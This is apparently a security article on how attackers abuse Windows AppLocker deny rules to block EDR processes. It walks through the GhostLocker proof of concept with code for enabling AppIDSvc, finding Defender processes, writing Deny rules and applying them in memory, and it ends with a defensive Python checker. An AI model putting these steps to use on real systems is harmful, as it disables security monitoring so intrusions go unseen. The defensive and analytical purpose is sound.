HIGH Attacks Reddit r/netsec

AppLocker Rules Abuse

Threat actors are abusing AppLocker in Windows to prevent EDR processes from running, allowing them to execute arbitrary commands and software without detection. This technique was observed in the Azorult loader malware in 2022, highlighting the potential for AppLocker to be misused for malicious purposes.

AppLocker was introduced by Microsoft in Windows 7 to enable organizations to define which executables, scripts or installers are allowed to run in their environments. AppLocker can reduce the attack surface by enforcing rules that allow only trusted executions, so that malicious code is prevented from running. It should be noted that AppLocker is not enabled by default and requires a solid understanding of the environment and user behaviour prior to any implementation. Threat actors could abuse AppLocker to deploy rules that prevent EDR processes from executing, in order to run arbitrary commands and software on the asset without EDR disruption. Splunk identified a malware called "Azorult loader" back in 2022 that introduced this behaviour.

Playbook

The Application Identity service (AppIDSvc) is a built-in Windows service that acts as the policy engine for AppLocker. The service is responsible for determining the identity of an executable, DLL, script, or MSI by analysing the following:

- File Path: e.g. C:\Program Files\Security*.exe
- Publisher Signature: digital signature, version
- File Hash: SHA256 Authenticode hash validation
- Package Metadata: company name, product version, etc.

If the service is stopped or disabled, AppLocker policies are not enforced on the host. AppLocker rules are stored in the following registry location:

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\SrpV2

[Figure: AppLocker Rules – Registry Key]

A proof of concept called GhostLocker was made publicly available that automates the process of creating AppLocker deny rules that target EDR executables. On assets where AppLocker is not enabled, the Application Identity service is not running.

[Figure: Application Identity – Default Startup Type]

The service startup type can be changed from Manual to Automatic from the command prompt or via execution of the following PowerShell cmdlet:
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\AppIDSvc" -Name Start -Value 2

[Figure: AppIDSvc Service Change via PowerShell]

[Figure: Application Identity – Startup Type Auto]

AppLocker enforcement applies only to new process creation events. Threat actors should force the system to reboot before attempting techniques with weaker operational security. Rebooting the system would affect cached credentials, as these will disappear from memory.

The proof of concept dynamically resolves the NtQuerySystemInformation API from ntdll.dll:

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return false;
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");

The SYSTEM_PROCESS_ID_INFORMATION structure is prepared so that the process image path is written into the allocated buffer:

    SYSTEM_PROCESS_ID_INFORMATION spi = { 0 };
    spi.ProcessId = PID;
    spi.ImageName.MaximumLength = 1024;
    spi.ImageName.Buffer = (PWSTR)allocBuffer;

NtQuerySystemInformation is then called with the SystemProcessIdInformation class to return the image path of the EDR process:

    status = NtQuerySystemInformation(SystemProcessIdInformation, &spi, sizeof(spi), 0);

The proof of concept takes a snapshot of the processes running on the asset using the CreateToolhelp32Snapshot API and enumerates them via Process32FirstW/Process32NextW until there is a match with the target EDR processes. If a match is found, the information is printed on the console:

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return;
    PROCESSENTRY32W pe;
    pe.dwSize = sizeof(pe);
    if (Process32FirstW(snap, &pe)) {
        do {
            if (isTargetProcess(pe.szExeFile)) {
                printf(GREEN "[+] Found Target Process\n" RESET
                       YELLOW "    Name: " RESET "%ws\n"
                       YELLOW "    PID: " RESET "%lu\n",
                       pe.szExeFile, pe.th32ProcessID);
                printf("\n");
                FuncNtQuerySystemInformation(pe.th32ProcessID);
            }
        } while (Process32NextW(snap, &pe));
    }
    CloseHandle(snap);

The running processes are compared against a predefined target list:

    const wchar_t* targetNames[] = {
        L"MpDefenderCoreService.exe",
        L"MsMpEng.exe",
        L"WinDefend.exe",
    };

During execution of the binary, the following information is printed on the console:

[Figure: GhostLocker – EDR Process Discovery]

GhostLocker generates deny rules for the targeted EDR processes:

    foreach ($exe in $ExeToBlock) {
        $id = [guid]::NewGuid().ToString()
        $name = Split-Path $exe -Leaf
        $dynamicBlockRules += '<FilePathRule Id="' + $id + '" Name="Block ' + $name + '" Description="Blocked by policy" UserOrGroupSid="S-1-1-0" Action="Deny">'
        $dynamicBlockRules += '<Conditions><FilePathCondition Path="' + $exe + '" /></Conditions>'
        $dynamicBlockRules += '</FilePathRule>'
    }

The tool then applies the AppLocker policy and forces a group policy refresh so the new rules take effect immediately:

    Set-AppLockerPolicy -XmlPolicy $tempPath -ErrorAction Stop
    gpupdate /force | Out-Null

It should be noted that the script is Base64-encoded and that these actions are executed in memory:

    void RunPowerShellInMemory() {
        std::wstring script = BuildFullPowerShellScript(...
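The deny rules the tool writes have a fixed shape (a FilePathRule with Action="Deny" for Everyone, S-1-1-0, whose FilePathCondition names a security product binary), which makes them easy to audit. The checker below is an added example, not part of the article or of GhostLocker: it parses the AppLocker policy XML in the format the rules above produce (for instance as exported by Get-AppLockerPolicy -Effective -Xml) and flags every Deny path rule whose image name is on the article's target list. The sample policy and rule Ids are constructed for the example.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Image names taken from the GhostLocker target list quoted in the article.
EDR_IMAGE_NAMES = {"mpdefendercoreservice.exe", "msmpeng.exe", "windefend.exe"}

@dataclass
class Finding:
    collection: str   # RuleCollection Type, e.g. "Exe"
    rule_id: str
    rule_name: str
    sid: str          # UserOrGroupSid the deny applies to (S-1-1-0 = Everyone)
    path: str

def image_name(path: str) -> str:
    """Last component of an AppLocker path condition, lower-cased ('*\\MsMpEng.exe' -> 'msmpeng.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_edr_deny_rules(policy_xml: str) -> list[Finding]:
    """Return every Deny FilePathRule whose path condition names a known EDR/AV image."""
    root = ET.fromstring(policy_xml)  # AppLocker policy XML carries no namespace
    findings: list[Finding] = []
    for coll in root.iter("RuleCollection"):
        for rule in coll.findall("FilePathRule"):
            if rule.get("Action") != "Deny":
                continue
            for cond in rule.iter("FilePathCondition"):
                path = cond.get("Path", "")
                if image_name(path) in EDR_IMAGE_NAMES:
                    findings.append(Finding(coll.get("Type", "?"), rule.get("Id", ""),
                                            rule.get("Name", ""), rule.get("UserOrGroupSid", ""), path))
    return findings

# Constructed sample policy: one normal Allow rule, one benign Deny, one Deny of the Defender engine.
SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="CONSTRUCTED-0000" Name="All files in Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="CONSTRUCTED-0001" Name="Block legacy tool" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="C:\Tools\legacy.exe" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="CONSTRUCTED-0002" Name="Block MsMpEng.exe" Description="Blocked by policy" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\Windows Defender\MsMpEng.exe" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

if __name__ == "__main__":
    for f in find_edr_deny_rules(SAMPLE_POLICY):
        print(f"[!] {f.collection} rule {f.rule_id} ({f.rule_name}) denies {f.path} for SID {f.sid}")
```

A deny written as a directory wildcard (for example a whole product folder ending in \*) is not caught by the image-name match, so pair this with a baseline diff of the SrpV2 registry key and of the AppIDSvc Start value mentioned above.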
